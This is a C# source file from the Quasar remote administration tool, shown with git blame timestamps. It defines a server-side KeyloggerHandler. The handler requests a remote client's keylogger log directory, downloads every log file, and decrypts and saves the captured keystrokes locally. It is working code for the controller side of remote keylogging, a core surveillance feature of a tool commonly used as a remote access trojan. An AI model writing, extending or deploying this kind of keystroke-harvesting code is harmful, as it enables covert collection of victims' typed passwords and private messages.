2018-10-05 21:58:09 +00:00
|
|
|
|
using Quasar.Common.Helpers;
|
2018-09-19 15:36:30 +00:00
|
|
|
|
using Quasar.Common.Messages;
|
2020-05-26 20:43:49 +00:00
|
|
|
|
using Quasar.Common.Models;
|
2018-09-19 15:36:30 +00:00
|
|
|
|
using Quasar.Common.Networking;
|
2020-05-26 20:43:49 +00:00
|
|
|
|
using Quasar.Server.Models;
|
2018-10-04 19:49:24 +00:00
|
|
|
|
using Quasar.Server.Networking;
|
2018-10-06 11:57:14 +00:00
|
|
|
|
using System;
|
2018-10-05 21:58:09 +00:00
|
|
|
|
using System.IO;
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
2018-10-04 19:49:24 +00:00
|
|
|
|
namespace Quasar.Server.Messages
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
2020-05-28 19:10:26 +00:00
|
|
|
|
/// <summary>
|
|
|
|
|
/// Handles messages for the interaction with the remote keylogger.
|
|
|
|
|
/// </summary>
|
|
|
|
|
public class KeyloggerHandler : MessageProcessorBase<string>, IDisposable
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// The client which is associated with this keylogger handler.
|
|
|
|
|
/// </summary>
|
|
|
|
|
private readonly Client _client;
|
|
|
|
|
|
|
|
|
|
/// <summary>
|
2020-05-26 20:43:49 +00:00
|
|
|
|
/// The file manager handler used to retrieve keylogger logs from the client.
|
2018-09-19 15:36:30 +00:00
|
|
|
|
/// </summary>
|
2020-05-26 20:43:49 +00:00
|
|
|
|
private readonly FileManagerHandler _fileManagerHandler;
|
|
|
|
|
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// The remote path of the keylogger logs directory.
|
|
|
|
|
/// </summary>
|
|
|
|
|
private string _remoteKeyloggerDirectory;
|
|
|
|
|
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// The amount of all running log transfers.
|
|
|
|
|
/// </summary>
|
|
|
|
|
private int _allTransfers;
|
|
|
|
|
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// The amount of all completed log transfers.
|
|
|
|
|
/// </summary>
|
|
|
|
|
private int _completedTransfers;
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// Initializes a new instance of the <see cref="KeyloggerHandler"/> class using the given client.
|
|
|
|
|
/// </summary>
|
|
|
|
|
/// <param name="client">The associated client.</param>
|
|
|
|
|
public KeyloggerHandler(Client client) : base(true)
|
|
|
|
|
{
|
|
|
|
|
_client = client;
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_fileManagerHandler = new FileManagerHandler(client, "Logs\\");
|
|
|
|
|
_fileManagerHandler.DirectoryChanged += DirectoryChanged;
|
|
|
|
|
_fileManagerHandler.FileTransferUpdated += FileTransferUpdated;
|
2020-05-31 13:33:23 +00:00
|
|
|
|
_fileManagerHandler.ProgressChanged += StatusUpdated;
|
2020-05-26 20:43:49 +00:00
|
|
|
|
MessageHandler.Register(_fileManagerHandler);
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/// <inheritdoc />
|
2020-05-26 20:43:49 +00:00
|
|
|
|
public override bool CanExecute(IMessage message) => message is GetKeyloggerLogsDirectoryResponse;
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
|
|
|
|
/// <inheritdoc />
|
|
|
|
|
public override bool CanExecuteFrom(ISender sender) => _client.Equals(sender);
|
|
|
|
|
|
|
|
|
|
/// <inheritdoc />
|
|
|
|
|
public override void Execute(ISender sender, IMessage message)
|
|
|
|
|
{
|
|
|
|
|
switch (message)
|
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
case GetKeyloggerLogsDirectoryResponse logsDirectory:
|
|
|
|
|
Execute(sender, logsDirectory);
|
2018-09-19 15:36:30 +00:00
|
|
|
|
break;
|
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
/// <summary>
|
|
|
|
|
/// Retrieves the keylogger logs and begins downloading them.
|
|
|
|
|
/// </summary>
|
|
|
|
|
public void RetrieveLogs()
|
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_client.Send(new GetKeyloggerLogsDirectory());
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
private void Execute(ISender client, GetKeyloggerLogsDirectoryResponse message)
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_remoteKeyloggerDirectory = message.LogsDirectory;
|
|
|
|
|
client.Send(new GetDirectory {RemotePath = _remoteKeyloggerDirectory});
|
|
|
|
|
}
|
2020-05-25 20:38:41 +00:00
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
private string GetDownloadProgress(int allTransfers, int completedTransfers)
|
|
|
|
|
{
|
|
|
|
|
decimal progress = Math.Round((decimal)((double)completedTransfers / (double)allTransfers * 100.0), 2);
|
|
|
|
|
return $"Downloading...({progress}%)";
|
|
|
|
|
}
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
2020-05-31 13:33:23 +00:00
|
|
|
|
private void StatusUpdated(object sender, string value)
|
|
|
|
|
{
|
|
|
|
|
// called when directory does not exist or access is denied
|
|
|
|
|
OnReport($"No logs found ({value})");
|
|
|
|
|
}
|
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
private void DirectoryChanged(object sender, string remotePath, FileSystemEntry[] items)
|
|
|
|
|
{
|
|
|
|
|
if (items.Length == 0)
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
2020-05-31 13:33:23 +00:00
|
|
|
|
OnReport("No logs found");
|
2018-09-19 15:36:30 +00:00
|
|
|
|
return;
|
|
|
|
|
}
|
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_allTransfers = items.Length;
|
|
|
|
|
_completedTransfers = 0;
|
|
|
|
|
OnReport(GetDownloadProgress(_allTransfers, _completedTransfers));
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
foreach (var item in items)
|
|
|
|
|
{
|
|
|
|
|
// don't escape from download directory
|
|
|
|
|
if (FileHelper.HasIllegalCharacters(item.Name))
|
|
|
|
|
{
|
|
|
|
|
// disconnect malicious client
|
|
|
|
|
_client.Disconnect();
|
|
|
|
|
return;
|
|
|
|
|
}
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_fileManagerHandler.BeginDownloadFile(Path.Combine(_remoteKeyloggerDirectory, item.Name), item.Name + ".html", true);
|
|
|
|
|
}
|
|
|
|
|
}
|
2018-09-19 15:36:30 +00:00
|
|
|
|
|
2020-05-26 20:43:49 +00:00
|
|
|
|
private void FileTransferUpdated(object sender, FileTransfer transfer)
|
|
|
|
|
{
|
|
|
|
|
if (transfer.Status == "Completed")
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
|
|
|
|
try
|
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_completedTransfers++;
|
|
|
|
|
File.WriteAllText(transfer.LocalPath, FileHelper.ReadLogFile(transfer.LocalPath, _client.Value.AesInstance));
|
|
|
|
|
OnReport(_allTransfers == _completedTransfers
|
|
|
|
|
? "Successfully retrieved all logs"
|
|
|
|
|
: GetDownloadProgress(_allTransfers, _completedTransfers));
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
2018-10-06 11:57:14 +00:00
|
|
|
|
catch (Exception)
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
OnReport("Failed to decrypt and write logs");
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
2020-05-26 20:43:49 +00:00
|
|
|
|
}
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
|
|
|
|
|
2020-05-28 19:10:26 +00:00
|
|
|
|
/// <summary>
|
|
|
|
|
/// Disposes all managed and unmanaged resources associated with this message processor.
|
|
|
|
|
/// </summary>
|
|
|
|
|
public void Dispose()
|
|
|
|
|
{
|
|
|
|
|
Dispose(true);
|
|
|
|
|
GC.SuppressFinalize(this);
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
protected virtual void Dispose(bool disposing)
|
2018-09-19 15:36:30 +00:00
|
|
|
|
{
|
2020-05-26 20:43:49 +00:00
|
|
|
|
if (disposing)
|
|
|
|
|
{
|
|
|
|
|
MessageHandler.Unregister(_fileManagerHandler);
|
2020-05-31 13:33:23 +00:00
|
|
|
|
_fileManagerHandler.ProgressChanged -= StatusUpdated;
|
2020-05-26 20:43:49 +00:00
|
|
|
|
_fileManagerHandler.FileTransferUpdated -= FileTransferUpdated;
|
|
|
|
|
_fileManagerHandler.DirectoryChanged -= DirectoryChanged;
|
|
|
|
|
_fileManagerHandler.Dispose();
|
|
|
|
|
}
|
2018-09-19 15:36:30 +00:00
|
|
|
|
}
|
|
|
|
|
}
|
|
|
|
|
}
|